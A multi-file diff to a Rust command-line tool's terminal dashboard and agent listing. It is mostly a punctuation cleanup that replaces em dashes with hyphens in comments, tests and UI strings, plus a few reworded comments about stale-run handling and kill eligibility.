-        // here - a pane that is not on screen - which is precisely why a plan
-        // sat still while every scroll key "worked".
+        // is what a scroll must move. Asserting `review_scroll` here - a pane
+        // that is not on screen - is precisely how a plan sits still while
+        // every scroll key "works" and this test stays green.
         dash.handle_key(key(KeyCode::Up));
         assert_eq!(dash.detail_scroll, 1);
         assert_eq!(dash.review_scroll, 0);

--- a/crates/leviath-cli/src/commands/dashboard/mcp.rs
+++ b/crates/leviath-cli/src/commands/dashboard/mcp.rs
@@ -4,7 +4,7 @@
 //! same operations as `lev mcp`. Add/remove are synchronous file writes done
 //! inline; login and test are long-running (a browser flow, a network round
 //! trip) so they are dispatched to [`mcp_background_loop`] over a channel and
-//! their results drain back as toasts — the same shape the daemon-command lane
+//! their results drain back as toasts - the same shape the daemon-command lane
 //! already uses.
 
 use tokio::sync::mpsc;
@@ -136,7 +136,7 @@ impl Dashboard {
             changed = true;
         }
         // A completed login/test may have changed stored auth, so refresh the
-        // status column — but only while the screen is open, to avoid needless
+        // status column - but only while the screen is open, to avoid needless
         // disk reads every tick.
         if changed && self.mcp_screen {
             self.refresh_mcp_rows();

--- a/crates/leviath-cli/src/commands/dashboard/mod.rs
+++ b/crates/leviath-cli/src/commands/dashboard/mod.rs
@@ -63,8 +63,8 @@ async fn daemon_background_loop(
                 "message",
             ),
         };
-        // Report what actually happened. This used to be discarded, so a cancel
-        // the daemon refused was indistinguishable from one that worked.
+        // Report what actually happened. Discarding this would make a cancel
+        // the daemon refused indistinguishable from one that worked.
         let outcome = match control.request(&request).await {
             Ok(ControlResponse::Ok { ok: true }) => types::DaemonOutcome {
                 run_id,

--- a/crates/leviath-cli/src/commands/dashboard/mod.rs
+++ b/crates/leviath-cli/src/commands/dashboard/mod.rs
@@ -100,8 +100,8 @@ async fn daemon_background_loop(
 ///
 /// Generic over `S: TerminalSetup` and `E: EventSource`. The only
 /// `TerminalSetup` in the library is the test double [`TestSetup`] (the real
-/// `CrosstermSetup` lives in the binary), so every monomorphization here — and
-/// in [`run_dashboard_loop`] — runs against a `ratatui::backend::TestBackend`
+/// `CrosstermSetup` lives in the binary), so every monomorphization here - and
+/// in [`run_dashboard_loop`] - runs against a `ratatui::backend::TestBackend`
 /// with canned events, keeping the whole function covered.
 async fn execute_core<S: TerminalSetup, E: EventSource>(
     dashboard: &mut Dashboard,
@@ -123,11 +123,11 @@ async fn execute_core<S: TerminalSetup, E: EventSource>(
 /// [`EventSource`] in tests, instead of a real terminal. Exits (returning
 /// `Ok(())`) once `dashboard.should_quit` is set; propagates the first I/O
 /// error from drawing or event polling, leaving raw mode / the alternate
-/// screen untouched on error -- restoring those is `execute`'s
+/// screen untouched on error - restoring those is `execute`'s
 /// responsibility, not this loop's.
 ///
 /// Generic over `B: Backend` and `impl EventSource`; in the measured test
-/// build it is only ever instantiated once -- with the single
+/// build it is only ever instantiated once - with the single
 /// [`TestBackendHarness`] backend and the single [`TestEventSource`] (both
 /// carry an injectable-failure switch, so the draw-error and poll-error `?`
 /// arms are exercised within that one monomorphization), never a real
@@ -250,14 +250,14 @@ fn mcp_system_now() -> u64 {
 
 /// Load config, build the dashboard + engine, and run the event loop against
 /// the injected [`TerminalSetup`] and [`EventSource`]. This is the whole
-/// `lev dash` command minus the two real-terminal doubles — so it is fully
+/// `lev dash` command minus the two real-terminal doubles - so it is fully
 /// unit-testable (drive it with `TestSetup` + a canned `TestEventSource`), and
 /// the binary's `real_dashboard` supplies the real crossterm `CrosstermSetup`
 /// + [`CrosstermEventSource`].
 ///
 /// The real terminal wiring cannot live here: constructing `CrosstermSetup`
 /// enables actual raw mode / the alternate screen and blocks forever on real
-/// keyboard input (an `is_terminal()` guard does not prevent the hang -- it
+/// keyboard input (an `is_terminal()` guard does not prevent the hang - it
 /// still hangs a real editor terminal full-screen). That irreducible sliver is
 /// the binary's job; everything it composes is exercised here.
 /// `yank_fn` is the clipboard implementation the dashboard's `y` keypress uses;
@@ -600,7 +600,7 @@ mod tests {
         let mut terminal = test_terminal();
         // A no-op Resize tick, then both wheel directions, a full
         // press-drag-release selection over the log panel, and the Esc that
-        // triggers quit -- covers every arm of the event match, including the
+        // triggers quit - covers every arm of the event match, including the
         // mouse one that carries scrolling and selection.
         let mouse = |kind, column, row| {
             Event::Mouse(crossterm::event::MouseEvent {
@@ -639,7 +639,7 @@ mod tests {
 
     #[tokio::test]
     async fn run_dashboard_loop_no_event_tick_then_quits() {
-        // Tick 1: `poll_event` returns `None` (simulated poll-timeout — no input
+        // Tick 1: `poll_event` returns `None` (simulated poll-timeout - no input
         // pending); tick 2: Esc quits.  The `None` entry exercises the
         // `if let Some(event)` fallthrough path (line 127 in mod.rs).
         let mut dashboard = make_test_dashboard();
@@ -720,7 +720,7 @@ mod tests {
     // ever used in the process, nor whatever `mio::Poll::poll` actually
     // observes against a `script`-allocated pty's fd. There is no
     // "1ms-bounded, side-effect-free" way to touch real crossterm event
-    // polling from a test at all -- so this doesn't get a test, matching
+    // polling from a test at all - so this doesn't get a test, matching
     // every other real-terminal entry point in this file (`execute`,
     // `open_controlling_tty` equivalent, etc.).
 
@@ -754,7 +754,7 @@ mod tests {
     // (`poll_event`, `try_lock`, `terminal.draw` are all synchronous), so on
     // the default current-thread `#[tokio::test]` runtime the executor's
     // single thread never regains control long enough for the timeout's own
-    // timer to fire -- a future that never yields can't be preempted by a
+    // timer to fire - a future that never yields can't be preempted by a
     // sibling future racing it. In a non-TTY sandbox
     // `CrosstermEventSource::poll_event` fails immediately (so it looks
     // bounded in headless testing); on a real terminal, with no scripted key
@@ -842,7 +842,7 @@ mod tests {
             |_d| async move {
                 let control = no_daemon_control();
                 let mut dashboard = init_dashboard(control.clone(), |_| false);
-                // `enable()` succeeds, then `create_terminal()?` fails -- deterministic
+                // `enable()` succeeds, then `create_terminal()?` fails - deterministic
                 // (no real backend / TTY involved), so this can never hang.
                 let mut setup = TestSetup {
                     enable_should_fail: false,

--- a/crates/leviath-cli/src/commands/dashboard/render/content.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/content.rs
@@ -154,7 +154,7 @@ impl Dashboard {
     ) {
         // Editing a document (an `EditText` interaction) takes over the content
         // pane: the editable textarea is rendered here, over the current text,
-        // instead of the read-only stage output — so the user revises the plan
+        // instead of the read-only stage output - so the user revises the plan
         // in place rather than in the bottom input bar.
         if self.editing_document() {
             self.input_textarea.set_block(
@@ -163,7 +163,7 @@ impl Dashboard {
                     .border_type(BorderType::Rounded)
                     .border_style(Style::default().fg(C_SUCCESS))
                     .title(Span::styled(
-                        " ✎ Editing this document — your changes replace it  ·  [Enter] save  \
+                        " ✎ Editing this document - your changes replace it  ·  [Enter] save  \
                          [Alt+↵] newline  [Esc] cancel ",
                         Style::default().fg(C_SUCCESS).add_modifier(Modifier::BOLD),
                     )),
@@ -478,7 +478,7 @@ impl Dashboard {
                 if let Some(edges) = graph.edges.get(sel_name) {
                     if edges.is_empty() {
                         lines.push(Line::from(Span::styled(
-                            "  Transitions: (terminal — no outgoing edges)",
+                            "  Transitions: (terminal - no outgoing edges)",
                             Style::default().fg(C_DIM),
                         )));
                     } else {
@@ -495,7 +495,7 @@ impl Dashboard {
                             let hint_part = edge
                                 .hint
                                 .as_deref()
-                                .map(|h| format!(" — {}", h))
+                                .map(|h| format!(" - {}", h))
                                 .unwrap_or_default();
                             lines.push(Line::from(vec![
                                 Span::styled(
@@ -509,7 +509,7 @@ impl Dashboard {
                     }
                 } else {
                     lines.push(Line::from(Span::styled(
-                        "  Transitions: (linear — no graph edges)",
+                        "  Transitions: (linear - no graph edges)",
                         Style::default().fg(C_DIM),
                     )));
                 }
@@ -677,7 +677,7 @@ impl Dashboard {
     #[expect(
         clippy::string_slice,
         reason = "`prefix_end` is only non-zero on a `starts_with` branch, where it is the length \
-                  of the ASCII tag that just matched — a char boundary"
+                  of the ASCII tag that just matched - a char boundary"
     )]
     fn build_output_lines(
         &self,
@@ -687,7 +687,7 @@ impl Dashboard {
     ) -> Vec<Line<'static>> {
         let content = if is_output {
             // When a document is up for review (a pending interaction's body,
-            // e.g. the plan being approved), show just that current instance —
+            // e.g. the plan being approved), show just that current instance -
             // not the full accumulated output history. `[l]` still shows logs.
             match self.reviewing_body() {
                 Some(body) => body,
@@ -1588,7 +1588,7 @@ mod tests {
                 transform: "replace".to_string(),
             }],
         );
-        // "implement" is selected stage — it has an incoming edge from "plan"
+        // "implement" is selected stage - it has an incoming edge from "plan"
         agent.graph_info = Some(crate::commands::dashboard::graph::GraphTransitionInfo {
             edges,
             entry_stage: "plan".to_string(),
@@ -1649,7 +1649,7 @@ mod tests {
 
     #[test]
     fn build_context_lines_with_no_edges_for_stage() {
-        // Stage has no entry in edges map at all → shows "linear — no graph edges"
+        // Stage has no entry in edges map at all → shows "linear - no graph edges"
         let dash = make_test_dashboard();
         let mut agent = make_test_agent("run-noedge", AgentDisplayStatus::Active);
         agent.context_snapshot = Some(make_context_snapshot(4000, 8000));
@@ -1810,7 +1810,7 @@ mod tests {
         let mut terminal = Terminal::new(backend).unwrap();
         let mut dash = make_test_dashboard();
         dash.stage_content_mode = StageContentMode::Output;
-        // We need actual content lines to match against — build_output_lines
+        // We need actual content lines to match against - build_output_lines
         // will return empty for non-run-state, so use context mode with a snapshot
         // that has entries containing "hello"
         dash.stage_content_mode = StageContentMode::Context;

--- a/crates/leviath-cli/src/commands/dashboard/render/input.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/input.rs
@@ -109,7 +109,7 @@ impl Dashboard {
             // ── FreeText / EditText: render the multi-line tui-textarea widget ──
             // No pending interaction request/prompt means this is a mid-run
             // message to a still-running agent rather than a response to a
-            // specific question — label it accordingly for consistent UX.
+            // specific question - label it accordingly for consistent UX.
             let is_message_mode = pending_req.is_none() && agent.waiting_prompt.is_none();
             let hint = if is_message_mode {
                 " Provide input while this is running  [Enter] send  [Alt+↵] newline  [Esc] cancel "

--- a/crates/leviath-cli/src/commands/dashboard/render/mod.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/mod.rs
@@ -110,7 +110,7 @@ impl Dashboard {
             && !matches!(agent.status, AgentDisplayStatus::Cancelled)
             && self.selected_stage_can_respond();
         // Agent is Active (not waiting on anything) but its current stage
-        // supports mid-run messages — same 'i' key, same input pane.
+        // supports mid-run messages - same 'i' key, same input pane.
         let accepts_messages = self.selected_agent_accepts_messages();
 
         let header_h: u16 = 1; // compact breadcrumb line
@@ -126,7 +126,7 @@ impl Dashboard {
         // Review body: shown when the pending interaction carries markdown for
         // review. `EditText` also uses `body`, but that is the editable document
         // (rendered in the seeded textarea once the user starts editing), not a
-        // read-only review doc — so it is excluded here. When the output pane is
+        // read-only review doc - so it is excluded here. When the output pane is
         // already showing the document (output mode), the separate review pane is
         // suppressed to avoid rendering it twice.
         let content_shows_body =
@@ -495,8 +495,8 @@ mod tests {
 
     #[test]
     fn draw_detail_view_graph_agent_uses_taller_stage_tabs_area() {
-        // `tabs_h` is `7` when `agent.graph_info.is_some()` and `3` otherwise
-        // -- every other detail-view test above leaves `graph_info: None`, so
+        // `tabs_h` is `7` when `agent.graph_info.is_some()` and `3` otherwise -
+        // every other detail-view test above leaves `graph_info: None`, so
         // the `7` branch was never exercised. Build a minimal
         // `GraphTransitionInfo` (same shape used by `render/stages.rs`'s own
         // graph tests) purely to flip `is_graph_view` to `true`; the graph

--- a/crates/leviath-cli/src/commands/dashboard/render/stages.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/stages.rs
@@ -142,7 +142,7 @@ impl Dashboard {
         // Only the tab matching the agent's current stage index may show live
         // (spinner / ticking-duration) treatment. A stage record can be left
         // stuck at `Active` (e.g. a prior stage whose completion was never
-        // recorded) even though the run has moved on — render those as
+        // recorded) even though the run has moved on - render those as
         // Complete instead of animating a spinner on a stage that isn't
         // actually running.
         let is_current_tab = i == agent.stage_index;
@@ -891,7 +891,7 @@ mod tests {
     #[test]
     fn draw_graph_view_dangling_edge_targets_hit_cycle_detection() {
         // Two edges pointing at stage names that don't exist in stage_names
-        // both resolve to "" via unwrap_or(""), so "" gets queued twice —
+        // both resolve to "" via unwrap_or(""), so "" gets queued twice -
         // exercising the `if !set.insert(name) { continue; }` cycle guard
         // when the second "" is popped and already visited.
         let backend = TestBackend::new(120, 10);
@@ -1137,14 +1137,14 @@ mod tests {
     // prior interactive/interactive_points stage whose completion was never
     // recorded) even though the run has moved on to a later stage. Only the
     // tab matching agent.stage_index should ever show the spinner/live
-    // marker — every other tab must render as Complete instead.
+    // marker - every other tab must render as Complete instead.
 
     #[test]
     fn build_stage_tab_title_stale_active_on_non_current_tab_shows_complete() {
         let dash = make_test_dashboard();
         let mut agent = make_test_agent("run-stale", AgentDisplayStatus::Active);
         agent.stage_index = 1; // run has moved on to stage 1 ("implement")
-        // Stage 0 ("plan") record is stuck Active — simulating the bug where
+        // Stage 0 ("plan") record is stuck Active - simulating the bug where
         // on_stage_result was never called for an Interactive/InteractivePoints
         // stage.
         let stale_plan = make_stage_record("plan", StageRunStatus::Active);

--- a/crates/leviath-cli/src/commands/dashboard/render/table.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/table.rs
@@ -65,7 +65,7 @@ impl Dashboard {
                     .map(|t| truncate(t.trim_start_matches('#').trim(), 26))
                     .unwrap_or_else(|| truncate(&agent.task, 26));
                 let tok_str = if agent.tokens_in == 0 && agent.tokens_out == 0 {
-                    "—".to_string()
+                    "-".to_string()
                 } else {
                     format!(
                         "{}↑ {}↓",
@@ -565,7 +565,7 @@ mod tests {
     #[test]
     fn draw_agent_table_title_none_falls_back_to_task() {
         // `title` is `None` before title generation completes (or when
-        // disabled) -- exercises the `.unwrap_or_else(|| truncate(&agent.task, 26))`
+        // disabled) - exercises the `.unwrap_or_else(|| truncate(&agent.task, 26))`
         // fallback closure, which every other test in this file never
         // reaches because `make_test_agent` always sets `title: Some(...)`.
         let backend = TestBackend::new(120, 40);
@@ -589,7 +589,7 @@ mod tests {
         // `make_test_agent` defaults to `num_stages: 2`, always taking the
         // `agent.num_stages > 1` branch (stage name + "i/n" counter). A
         // single-stage agent takes the other arm (bare truncated stage
-        // name, no counter) -- never exercised elsewhere in this file.
+        // name, no counter) - never exercised elsewhere in this file.
         let backend = TestBackend::new(120, 40);
         let mut terminal = Terminal::new(backend).unwrap();
         let mut dash = make_test_dashboard();
@@ -915,7 +915,7 @@ mod tests {
         let text: String = line.spans.iter().map(|s| s.content.as_ref()).collect();
         assert!(text.contains("input"));
         assert!(text.contains("[i]"));
-        // 'm' was unified into 'i' — no separate [m] hint should remain.
+        // 'm' was unified into 'i' - no separate [m] hint should remain.
         assert!(!text.contains("[m]"));
     }
 

--- a/crates/leviath-cli/src/commands/dashboard/state.rs
+++ b/crates/leviath-cli/src/commands/dashboard/state.rs
@@ -44,7 +44,7 @@ pub(crate) struct Dashboard {
     pub(super) choice_selected: usize,
     /// Which stage tab is currently focused in the detail view
     pub(super) selected_stage: usize,
-    /// Whether the content pane shows Output or Logs — global across all stage tabs.
+    /// Whether the content pane shows Output or Logs - global across all stage tabs.
     pub(super) stage_content_mode: StageContentMode,
     /// The selected run's context-window history (from its `run.lvr` archive),
     /// loaded lazily when the user starts browsing it in the Context view. Empty
@@ -122,7 +122,7 @@ pub(crate) struct Dashboard {
     /// `init_dashboard`, retained by tests to inject outcomes.
     pub(super) daemon_outcome_tx: Option<mpsc::UnboundedSender<DaemonOutcome>>,
     /// The run ids the daemon currently holds, refreshed each tick. `None` when
-    /// the daemon did not answer — the disk view is then taken at face value
+    /// the daemon did not answer - the disk view is then taken at face value
     /// rather than declaring every run stale.
     pub(super) daemon_run_ids: Option<std::collections::HashSet<String>>,
     /// Wall-clock source, injected so staleness is testable without sleeping.
@@ -480,7 +480,7 @@ impl Dashboard {
 
     /// Push a transient toast, capping the on-screen stack at 4 (oldest drops).
     /// An associated fn over `&mut Vec<Toast>` (not `&mut self`) so it can be
-    /// called while another field of `self` — e.g. `self.agents` — is borrowed.
+    /// called while another field of `self` - e.g. `self.agents` - is borrowed.
     /// Push a toast onto this dashboard with the standard display duration.
     pub(super) fn toast(&mut self, msg: impl Into<String>, level: ToastLevel) {
         Self::push_toast(&mut self.toasts, msg, level, 30);
@@ -527,9 +527,9 @@ impl Dashboard {
     /// it: the daemon does not hold it *and* its metadata has not been touched
     /// in [`STALE_AFTER_SECS`].
     ///
-    /// Both halves are needed. The daemon's list alone is not enough — it is
+    /// Both halves are needed. The daemon's list alone is not enough - it is
     /// empty whenever the daemon is unreachable, which would flip every healthy
-    /// run to STALE. The timestamp alone is not enough either — a run mid-request
+    /// run to STALE. The timestamp alone is not enough either - a run mid-request
     /// legitimately writes nothing for a while.
     fn looks_stale(&self, run: &runstate::RunMeta) -> bool {
         let Some(live) = &self.daemon_run_ids else {
@@ -545,7 +545,7 @@ impl Dashboard {
         for run in runs {
             // A live open prompt from the daemon's hub (populated each tick by
             // `sync_interactions`) is the authoritative signal that this agent is
-            // blocked on us — surface it regardless of the persisted status,
+            // blocked on us - surface it regardless of the persisted status,
             // which can lag a tick behind the hub or (for tool-approval prompts)
             // never flips on its own.
             let pending_request = self.pending_interactions.get(&run.run_id).cloned();
@@ -643,12 +643,12 @@ impl Dashboard {
                         | AgentDisplayStatus::Error(_)
                 );
                 if now_is_waiting {
-                    // Entering or staying in a wait — freeze timer at entry point
+                    // Entering or staying in a wait - freeze timer at entry point
                     if agent.active_until.is_none() {
                         agent.active_until = Some(run.updated_at);
                     }
                 } else {
-                    // Leaving a wait — accumulate how long we were waiting
+                    // Leaving a wait - accumulate how long we were waiting
                     if let Some(wait_start) = agent.active_until.take() {
                         agent.waiting_secs += (run.updated_at - wait_start).max(0) as u64;
                     }
@@ -680,7 +680,7 @@ impl Dashboard {
                                 && waiting_prompt.is_some()
                                 && matches!(run.status, RunStatus::WaitingInput)
                             {
-                                // Newly needs input — toast (not for CompleteInteractive which is optional)
+                                // Newly needs input - toast (not for CompleteInteractive which is optional)
                                 let name = agent
                                     .title
                                     .clone()
@@ -702,7 +702,7 @@ impl Dashboard {
                     agent.last_answered_request_id = None;
                 }
             } else {
-                // New agent — toasts only after the initial sync (avoid flooding on startup)
+                // New agent - toasts only after the initial sync (avoid flooding on startup)
                 if self.initial_sync_done {
                     if needs_input
                         && waiting_prompt.is_some()
@@ -792,7 +792,7 @@ impl Dashboard {
     /// Refresh which runs the daemon actually holds.
     ///
     /// The dashboard lists runs from disk and the daemon lists them from memory,
-    /// and nothing reconciled the two — so a run whose daemon had died sat at
+    /// and nothing reconciled the two - so a run whose daemon had died sat at
     /// ACTIVE with a ticking timer forever. On any transport error this is set
     /// back to `None`, meaning "unknown", so an unreachable daemon does not make
     /// every run look dead.
@@ -887,7 +887,7 @@ impl Dashboard {
     /// Build a tree-ordered list of agent indices with tree connector prefixes.
     ///
     /// Depth-first tree order over the given root agent indices (in the order
-    /// supplied — the caller sorts them), nesting each root's children beneath it.
+    /// supplied - the caller sorts them), nesting each root's children beneath it.
     /// Returns `Vec<(original_index, tree_prefix)>`.
     pub(super) fn build_tree_order(&self, root_order: &[usize]) -> Vec<(usize, String)> {
         let mut result = Vec::new();
@@ -941,7 +941,7 @@ mod tests {
 
     use crate::commands::dashboard::test_support::make_test_dashboard;
 
-    /// Root agent indices (no parent), in agent order — the input the production
+    /// Root agent indices (no parent), in agent order - the input the production
     /// path feeds to `build_tree_order` (there it's the status-sorted roots).
     fn roots_of(dash: &Dashboard) -> Vec<usize> {
         dash.agents
@@ -1354,7 +1354,7 @@ mod tests {
         dash.update_display_indices();
         dash.selected = 1;
         dash.table_state.select(Some(1));
-        // Re-sort without changing agents — selection should be preserved
+        // Re-sort without changing agents - selection should be preserved
         dash.update_display_indices();
         assert_eq!(dash.selected, 1);
     }
@@ -1830,7 +1830,7 @@ mod tests {
         let mut dash = make_test_dashboard();
         let mut agent = make_test_agent("run-1", AgentDisplayStatus::Waiting);
         agent.waiting_prompt = Some("prompt text".to_string());
-        agent.pending_request = None; // no structured request — legacy path
+        agent.pending_request = None; // no structured request - legacy path
         agent.stage_index = 0;
         dash.agents.push(agent);
         dash.update_display_indices();
@@ -1924,7 +1924,7 @@ mod tests {
     // ─── sync_from_run_state ────────────────────────────────────────────────
     //
     // Uses real on-disk run directories (via runstate::create_run), like
-    // runstate.rs's own `list_runs_returns_sorted` test does — unique run_ids
+    // runstate.rs's own `list_runs_returns_sorted` test does - unique run_ids
     // + inclusion checks (not exact-list assertions) so these coexist safely
     // with any other real runs on disk and with concurrently-running tests.
 
@@ -1986,7 +1986,7 @@ mod tests {
 
     /// The reported bug's shape: a run whose `meta.json` claims `starting` /
     /// `running`, which the daemon does not hold and which has not been touched
-    /// in a long time, is not ACTIVE — nothing is driving it.
+    /// in a long time, is not ACTIVE - nothing is driving it.
     #[test]
     fn a_run_the_daemon_does_not_hold_and_has_not_moved_shows_as_stale() {
         crate::runstate::with_isolated_runs_dir("sync-stale-run", |_d| {
@@ -2011,7 +2011,7 @@ mod tests {
         });
     }
 
-    /// A run the daemon *does* hold is active however old its metadata looks —
+    /// A run the daemon *does* hold is active however old its metadata looks -
     /// one long inference legitimately writes nothing for a while.
     #[test]
     fn a_run_the_daemon_holds_is_never_stale() {
@@ -2033,7 +2033,7 @@ mod tests {
         });
     }
 
-    /// An unreachable daemon means "unknown", not "everything is dead" — the
+    /// An unreachable daemon means "unknown", not "everything is dead" - the
     /// list is empty in both cases, so treating them alike would flip every
     /// healthy run to STALE the moment the socket blipped.
     #[test]
@@ -2056,7 +2056,7 @@ mod tests {
         });
     }
 
-    /// A run the daemon doesn't hold but which is still writing is active — it
+    /// A run the daemon doesn't hold but which is still writing is active - it
     /// may simply not be registered yet (a just-spawned run, a fan-out worker).
     #[test]
     fn a_recently_updated_run_is_not_stale_even_if_unregistered() {
@@ -2124,7 +2124,7 @@ mod tests {
     /// above inject a fixed one, so this is the only place it runs).
     #[test]
     fn system_clock_reports_a_wall_clock_time() {
-        // Well after 2020 and before 2100 — i.e. a real epoch second.
+        // Well after 2020 and before 2100 - i.e. a real epoch second.
         let now = system_now_secs();
         assert!(now > 1_577_836_800 && now < 4_102_444_800, "got {now}");
     }
@@ -2295,7 +2295,7 @@ mod tests {
         // The bug fix: a run whose persisted status is still `Running` but which
         // the daemon's hub reports an open interaction for (e.g. a tool-approval
         // prompt, which never flips the persisted status on its own) must show
-        // as Waiting and surface the prompt — not sit silently Active.
+        // as Waiting and surface the prompt - not sit silently Active.
         crate::runstate::with_isolated_runs_dir(
             "sync_from_run_state_running_agent_with_open_prompt_surfaces_it",
             |_d| {
@@ -2393,7 +2393,7 @@ mod tests {
         // but for a brand-new agent that's already `CompleteInteractive`
         // (rather than `WaitingInput`) with a pending request. Exercises the
         // `false` arm of `matches!(run.status, RunStatus::WaitingInput)` in
-        // the "new agent" branch of `sync_from_run_state` -- every other
+        // the "new agent" branch of `sync_from_run_state` - every other
         // test reaching that `if self.initial_sync_done { ... }` block does
         // so with `run.status == WaitingInput`, so that `matches!`'s `false`
         // arm (CompleteInteractive input is optional, no "needs input"
@@ -2579,8 +2579,8 @@ mod tests {
         // `true` by every `sync_from_run_state_existing_agent_*` test above,
         // since they all start from an Active/Waiting agent. Start from an
         // agent that's already `Complete` instead, so that block is skipped
-        // entirely on the next sync -- even though the underlying
-        // `RunStatus` does change -- covering the `prev_status_was_active ==
+        // entirely on the next sync - even though the underlying
+        // `RunStatus` does change - covering the `prev_status_was_active ==
         // false` path.
         crate::runstate::with_isolated_runs_dir(
             "sync_from_run_state_existing_agent_was_already_terminal_skips_transition_toast_block",
@@ -2605,7 +2605,7 @@ mod tests {
                 // `meta2` above has no `.error` set, so the mapped message defaults
                 // to the empty string (`run.error.clone().unwrap_or_default()`).
                 assert_eq!(agent.status, AgentDisplayStatus::Error(String::new()));
-                // No transition toast fires -- the block only runs when the agent
+                // No transition toast fires - the block only runs when the agent
                 // was previously Active/Waiting, which it wasn't here.
                 // Seed an unrelated toast first so `.any()` below actually invokes
                 // its predicate at least once instead of short-circuiting on an
@@ -2637,7 +2637,7 @@ mod tests {
                 dash.sync_from_run_state(); // still Running -> Active, no transition
 
                 // Scoped to this test's (uniquely-named) agent rather than
-                // `dash.toasts.is_empty()` — the dashboard also picks up any other
+                // `dash.toasts.is_empty()` - the dashboard also picks up any other
                 // real/concurrently-running-test runs on disk via list_runs(), whose
                 // own transitions may toast independently of this one.
                 // Seed an unrelated toast first so `.any()` below actually invokes
@@ -2723,7 +2723,7 @@ mod tests {
                     .active_until
                     .unwrap();
 
-                // Now the run resumes (Running) — clear the interaction and re-sync.
+                // Now the run resumes (Running) - clear the interaction and re-sync.
                 dash.pending_interactions.remove(run_id);
                 let mut meta2 = make_run_meta(run_id, RunStatus::Running);
                 meta2.updated_at = entered_wait_at + 25;
@@ -2800,7 +2800,7 @@ mod tests {
                 dash.sync_from_run_state(); // first sync creates the agent, already Waiting -> no toast (new agent, initial sync)
                 dash.toasts.clear();
 
-                // Still waiting, same kind of request — re-sync must not toast again.
+                // Still waiting, same kind of request - re-sync must not toast again.
                 dash.sync_from_run_state();
                 // Seed an unrelated toast first so `.any()` below actually invokes
                 // its predicate at least once instead of short-circuiting on an
@@ -2862,7 +2862,7 @@ mod tests {
         crate::runstate::with_isolated_runs_dir(
             "sync_from_run_state_waiting_with_no_pending_request_leaves_agent_unchanged",
             |_d| {
-                // WaitingInput but no pending.json on disk (e.g. race/cleanup) — the
+                // WaitingInput but no pending.json on disk (e.g. race/cleanup) - the
                 // `if waiting_prompt.is_some()` branch is skipped entirely.
                 let run_id = "test-sync-waiting-no-pending";
                 cleanup_run(run_id);
@@ -2955,7 +2955,7 @@ mod tests {
                 assert!(agent.waiting_prompt.is_some());
                 // Seed a toast that *does* contain `run_id` (but not "needs input")
                 // so the closure below's `has_id && has_tag` actually evaluates
-                // `has_tag` at least once -- the real "completed" toast pushed by
+                // `has_tag` at least once - the real "completed" toast pushed by
                 // `sync_from_run_state` uses `truncate(&agent.blueprint_name, 20)`,
                 // and `run_id` here is longer than 20 chars, so it never contains
                 // the full `run_id` substring on its own.

--- a/crates/leviath-cli/src/commands/dashboard/types.rs
+++ b/crates/leviath-cli/src/commands/dashboard/types.rs
@@ -67,8 +67,8 @@ impl AgentDisplayStatus {
     }
 
     /// Whether the run can be killed. Anything that has not finished can be -
-    /// including `Idle` and `Stale`, which the kill action used to skip, leaving
-    /// a run the dashboard showed as live with no way to get rid of it.
+    /// `Idle` and `Stale` included: skipping those would leave a run the
+    /// dashboard shows as live with no way to get rid of it.
     pub(super) fn is_killable(&self) -> bool {
         !self.is_terminal()
     }
@@ -164,9 +164,9 @@ pub(super) enum DaemonCommand {
 
 /// The result of a [`DaemonCommand`], drained each tick.
 ///
-/// The dashboard used to discard these. A cancel that the daemon refused looked
-/// identical to one that worked: the row flashed CANCEL, the log said "Killed",
-/// and the next disk sync put it back to ACTIVE with no explanation.
+/// Discarding these would make a cancel the daemon refused look identical to
+/// one that worked: the row flashes CANCEL, the log says "Killed", and the
+/// next disk sync puts it back to ACTIVE with no explanation.
 #[derive(Debug, PartialEq)]
 pub(super) struct DaemonOutcome {
     /// The run the command targeted.

--- a/crates/leviath-cli/src/commands/dashboard/types.rs
+++ b/crates/leviath-cli/src/commands/dashboard/types.rs
@@ -34,7 +34,7 @@ pub enum AgentDisplayStatus {
     Idle,
     Cancelled,
     /// On disk the run claims to be live, but the daemon has no such run and its
-    /// metadata has not been touched in a long time — so nothing is driving it.
+    /// metadata has not been touched in a long time - so nothing is driving it.
     ///
     /// Shown distinctly rather than as ACTIVE because the two are not the same
     /// thing to the user: an ACTIVE row implies work is happening. Killable, like
@@ -66,7 +66,7 @@ impl AgentDisplayStatus {
         )
     }
 
-    /// Whether the run can be killed. Anything that has not finished can be —
+    /// Whether the run can be killed. Anything that has not finished can be -
     /// including `Idle` and `Stale`, which the kill action used to skip, leaving
     /// a run the dashboard showed as live with no way to get rid of it.
     pub(super) fn is_killable(&self) -> bool {

--- a/crates/leviath-cli/src/commands/list.rs
+++ b/crates/leviath-cli/src/commands/list.rs
@@ -109,7 +109,7 @@ fn print_agent_listing(
     // Tracks whether the user has any agent they can actually *run*. The
     // bundled catalog deliberately does not count: it is always non-empty, and
     // treating it as "you have agents" would suppress the get-started guidance
-    // for exactly the person who needs it — someone with a fresh install and
+    // for exactly the person who needs it - someone with a fresh install and
     // nothing installed yet.
     let mut found_runnable = false;
 
@@ -122,7 +122,7 @@ fn print_agent_listing(
             let desc = if info.description.is_empty() {
                 String::new()
             } else {
-                format!(" — {}", info.description)
+                format!(" - {}", info.description)
             };
             println!("  {} (v{}){}", info.name, info.version, desc);
         }
@@ -138,7 +138,7 @@ fn print_agent_listing(
         let desc = if info.description.is_empty() {
             String::new()
         } else {
-            format!(" — {}", info.description)
+            format!(" - {}", info.description)
         };
         println!("Local (current directory):");
         println!("  {} (v{}){}", info.name, info.version, desc);
@@ -158,14 +158,14 @@ fn print_agent_listing(
             let desc = if info.description.is_empty() {
                 String::new()
             } else {
-                format!(" — {}", info.description)
+                format!(" - {}", info.description)
             };
             println!("  {} (v{}){}", info.name, info.version, desc);
         }
         println!();
     }
 
-    // 4. Bundled agents — the blueprints embedded in this binary.
+    // 4. Bundled agents - the blueprints embedded in this binary.
     //
     // This used to scan `<exe_dir>/agents`, a directory no real install has, so
     // the section never printed outside a git checkout. It now reports the
@@ -187,7 +187,7 @@ fn print_agent_listing(
     // No emptiness guard: the embedded catalog is always populated (a build
     // that found no blueprints fails `bundled`'s own invariant test), so an
     // `if !builtin_names.is_empty()` here would be a branch that can never be
-    // false — unreachable code dressed up as a handled case.
+    // false - unreachable code dressed up as a handled case.
     println!("Bundled agents (install with `lev setup`):");
